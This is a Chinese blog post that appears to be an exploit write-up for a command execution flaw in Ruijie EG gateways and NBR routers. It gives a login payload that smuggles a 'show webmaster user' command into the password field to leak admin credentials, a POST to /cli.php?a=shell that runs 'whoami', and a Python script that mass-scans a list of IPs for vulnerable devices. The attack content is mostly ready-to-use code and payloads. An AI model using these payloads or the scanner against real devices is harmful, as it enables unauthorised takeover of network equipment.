锐捷EG易网关与NBR路由器命令执行漏洞-2

文章目录

    • 1、获取密码
    • 2、登陆后台RCE
    • 3、poc脚本

前言:关于锐捷EG易网关与NBR路由器的命令执行漏洞
锐捷EG易网关与NBR路由器命令执行漏洞-2_第1张图片
锐捷EG易网关与NBR路由器命令执行漏洞-2_第2张图片

1、获取密码

poc:

username=admin&password=pass?show webmaster user

锐捷EG易网关与NBR路由器命令执行漏洞-2_第3张图片

2、登陆后台RCE

前提:成功登陆后台
poc:

POST /cli.php?a=shell

notdelay=true&command=whoami

在这里插入图片描述

锐捷EG易网关与NBR路由器命令执行漏洞-2_第4张图片

3、poc脚本

随便写了个,比较简单,可以修改
1.txt内容格式就是ip就行,一行一个IP
格式如下:

1.1.1.1
2.2.2.2
3.3.3.3

代码如下

import requests
import logging

logging.captureWarnings(True)  #忽略警告
fopen=open("1.txt",'r')
lines=fopen.readlines()

#print(lines)

for ip in lines:

    ip=ip.strip()
    #print("正在测试"+ip)
    try:
        #data = "username=admin&password=admin?show webmaster user"
        data={'username': 'admin',
              'password':'pass?show webmaster use'}
        r = requests.post("https://"+ip+":4430/login.php", verify=False,timeout=1,data=data)
        #print(r.status_code)
        #print("https://"+ip+":4430/login.php")
        #print(r.text)
        if "data" in r.text:
            print("#################"+ip+"存在锐捷EG易网关命令执行#################")
        else:
            print(ip+"不存在锐捷EG易网关命令执行")
    except:
            pass

锐捷EG易网关与NBR路由器命令执行漏洞-2_第5张图片

锐捷EG易网关与NBR路由器命令执行漏洞-2_第6张图片
还有遇到的一个锐捷远程代码执行漏洞,点击传送门

你可能感兴趣的:(实战漏洞复现,锐捷EG易网关与NBR路由器)